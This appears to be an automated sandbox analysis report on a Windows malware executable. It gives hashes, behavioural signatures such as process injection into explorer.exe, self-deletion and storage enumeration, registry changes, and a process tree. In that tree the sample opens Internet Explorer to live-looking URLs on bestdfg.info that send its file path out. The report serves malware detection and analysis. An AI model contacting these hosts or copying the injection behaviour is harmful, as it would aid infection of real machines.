Analysis
-
max time kernel
112s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
19/09/2022, 12:39
Static task
static1
Behavioral task
behavioral1
Sample
37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
Resource
win10v2004-20220901-en
General
-
Target
37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe
-
Size
113KB
-
MD5
130d7f2db76e189a07d0a27dcca40cea
-
SHA1
c004862bc5768ed546cce7fa0c9d4723f8a68498
-
SHA256
37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5
-
SHA512
6421c1d7ebda320541bcec1c23300221798c963b800b6d172f278b49ffaae32a2abe82cf49c98d88d2b853cdbe443aded017e670c207a7ff37dead2275e51270
-
SSDEEP
3072:34eYZ4+1JXJJO1sIOZFe4Cp+JIpNVd/C290bA:I5O8KSIkFe4qpNVc5k
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2800 explorer.exe -
Loads dropped DLL 7 IoCs
pid Process 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1148 set thread context of 2800 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 65 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\PageSetup IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{94D7A861-385E-11ED-AA2C-DE5CC620A9B4} = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "370386416" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IntelliForms IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IETld\LowMic IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a063a35f6bccd801 IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6400000019000000ea0400007e020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\InternetRegistry IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d3b98f5693c0d24b85f349229339c59c000000000200000000001066000000010000200000003ec82de3d6a31c2459f4673e58d75a2f47e1c5610671b854bfcd4ba0cd275874000000000e80000000020000200000007a5ad214f7ee1a17e95bcb1d6ec7b666c0aa76742a491f67173dd7f9400031c320000000602831dea8ebe02549d1591279449dfdc73f668e7d23058b33f899ee9a42c8be40000000ac9beb485bd2106ea89bcf79f38975fb1a33ca3a8c6187482ad84600f0611369ec7d2259fe9c86e48fd7292f00c79f5dac489f720744d6baccb407d403ef4026 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Zoom IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{94D78151-385E-11ED-AA2C-DE5CC620A9B4} = "0" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\PageSetup IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d3b98f5693c0d24b85f349229339c59c000000000200000000001066000000010000200000008b9abbd066213638b2124165e3c0d85174be181145305e31c1735e4717aab840000000000e800000000200002000000028bfa216e8d0ce989fab9f46fa87b9d066906fbb95bacd3eb5ee85a19173890a900000000f13822cce8e057f9888e57ebc6f98686cdaba05b9555edc1c79f6489f4688f97337ac29452991db69ceffdf25d2ca833ad7c7dc136b536a7b50f790ee2aeceb1357e4829741b6a9fce839d37af26ca6e2ac0a44fcc1151fd9da59b0454de5e44d5a52c53e8a99585a8d853c48a0e397652e29739cd6d8f393ecf3e5142c30eb54d5f28e1d21fe2a41a9daecc71804774000000073165da47d005e0b1d9fd6d8e2f9824e912a7cf13a8e70aac14fbb542aebdbe15c643bbc75326f3f9385c6ca114b2977621e71bdcbe54026d75dd6faf9c21e6c IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE -
Suspicious use of FindShellTrayWindow 12 IoCs
pid Process 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2000 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 50 IoCs
pid Process 2000 IEXPLORE.EXE 2000 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 816 IEXPLORE.EXE 816 IEXPLORE.EXE 1548 IEXPLORE.EXE 1548 IEXPLORE.EXE 1632 IEXPLORE.EXE 1632 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 848 IEXPLORE.EXE 848 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 816 IEXPLORE.EXE 816 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2116 IEXPLORE.EXE 2116 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2248 IEXPLORE.EXE 2248 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 1632 IEXPLORE.EXE 1632 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2456 IEXPLORE.EXE 2456 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 848 IEXPLORE.EXE 848 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2116 IEXPLORE.EXE 2116 IEXPLORE.EXE 2004 IEXPLORE.EXE 2004 IEXPLORE.EXE 2728 IEXPLORE.EXE 2728 IEXPLORE.EXE 2728 IEXPLORE.EXE 2728 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1148 wrote to memory of 1660 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 30 PID 1148 wrote to memory of 1660 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 30 PID 1148 wrote to memory of 1660 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 30 PID 1148 wrote to memory of 1660 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 30 PID 1148 wrote to memory of 1660 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 30 PID 1148 wrote to memory of 1660 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 30 PID 1148 wrote to memory of 1660 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 30 PID 1148 wrote to memory of 556 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 31 PID 1148 wrote to memory of 556 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 31 PID 1148 wrote to memory of 556 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 31 PID 1148 wrote to memory of 556 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 31 PID 1148 wrote to memory of 556 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 31 PID 1148 wrote to memory of 556 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 31 PID 1148 wrote to memory of 556 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 31 PID 1660 wrote to memory of 2000 1660 iexplore.exe 32 PID 1660 wrote to memory of 2000 1660 iexplore.exe 32 PID 1660 wrote to memory of 2000 1660 iexplore.exe 32 PID 1660 wrote to memory of 2000 1660 iexplore.exe 32 PID 556 wrote to memory of 2004 556 iexplore.exe 33 PID 556 wrote to memory of 2004 556 iexplore.exe 33 PID 556 wrote to memory of 2004 556 iexplore.exe 33 PID 556 wrote to memory of 2004 556 iexplore.exe 33 PID 2004 wrote to memory of 816 2004 IEXPLORE.EXE 34 PID 2000 wrote to memory of 1548 2000 IEXPLORE.EXE 35 PID 2004 wrote to memory of 816 2004 IEXPLORE.EXE 34 PID 2000 wrote to memory of 1548 2000 IEXPLORE.EXE 35 PID 2004 wrote to memory of 816 2004 IEXPLORE.EXE 34 PID 2000 wrote to memory of 1548 2000 IEXPLORE.EXE 35 PID 2000 wrote to memory of 1548 2000 IEXPLORE.EXE 35 PID 2004 wrote to memory of 816 2004 IEXPLORE.EXE 34 PID 2000 wrote to memory of 1548 2000 IEXPLORE.EXE 35 PID 2004 wrote to memory of 816 2004 IEXPLORE.EXE 34 PID 2000 wrote to memory of 1548 2000 IEXPLORE.EXE 35 PID 2004 wrote to memory of 816 2004 IEXPLORE.EXE 34 PID 2000 wrote to memory of 1548 2000 IEXPLORE.EXE 35 PID 2004 wrote to memory of 816 2004 IEXPLORE.EXE 34 PID 1148 wrote to memory of 1668 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 36 PID 1148 wrote to memory of 1668 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 36 PID 1148 wrote to memory of 1668 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 36 PID 1148 wrote to memory of 1668 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 36 PID 1148 wrote to memory of 1668 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 36 PID 1148 wrote to memory of 1668 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 36 PID 1148 wrote to memory of 1668 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 36 PID 1668 wrote to memory of 512 1668 iexplore.exe 37 PID 1668 wrote to memory of 512 1668 iexplore.exe 37 PID 1668 wrote to memory of 512 1668 iexplore.exe 37 PID 1668 wrote to memory of 512 1668 iexplore.exe 37 PID 2004 wrote to memory of 1632 2004 IEXPLORE.EXE 38 PID 2004 wrote to memory of 1632 2004 IEXPLORE.EXE 38 PID 2004 wrote to memory of 1632 2004 IEXPLORE.EXE 38 PID 2004 wrote to memory of 1632 2004 IEXPLORE.EXE 38 PID 2004 wrote to memory of 1632 2004 IEXPLORE.EXE 38 PID 2004 wrote to memory of 1632 2004 IEXPLORE.EXE 38 PID 2004 wrote to memory of 1632 2004 IEXPLORE.EXE 38 PID 1148 wrote to memory of 896 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 39 PID 1148 wrote to memory of 896 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 39 PID 1148 wrote to memory of 896 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 39 PID 1148 wrote to memory of 896 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 39 PID 1148 wrote to memory of 896 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 39 PID 1148 wrote to memory of 896 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 39 PID 1148 wrote to memory of 896 1148 37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe 39 PID 896 wrote to memory of 1628 896 iexplore.exe 40 PID 896 wrote to memory of 1628 896 iexplore.exe 40 PID 896 wrote to memory of 1628 896 iexplore.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe"C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dsdc.bestdfg.info:251/?t=919&i=ie&a64852def0cd3372a256db34473567272b10e818=a64852def0cd3372a256db34473567272b10e818&uu=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8182⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dsdc.bestdfg.info:251/?t=919&i=ie&a64852def0cd3372a256db34473567272b10e818=a64852def0cd3372a256db34473567272b10e818&uu=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8183⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2000 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1548
-
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a1&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8182⤵
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a1&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8183⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:816
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:406532 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1632
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:209933 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:848
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:3355662 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2116
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:3093540 /prefetch:24⤵
- Suspicious use of SetWindowsHookEx
PID:2248
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:3355703 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2456
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:1848353 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2728
-
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a2&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8182⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a2&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8183⤵PID:512
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a3&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8182⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a3&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8183⤵PID:1628
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a4&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8182⤵PID:1568
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a4&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8183⤵PID:1600
-
-
-
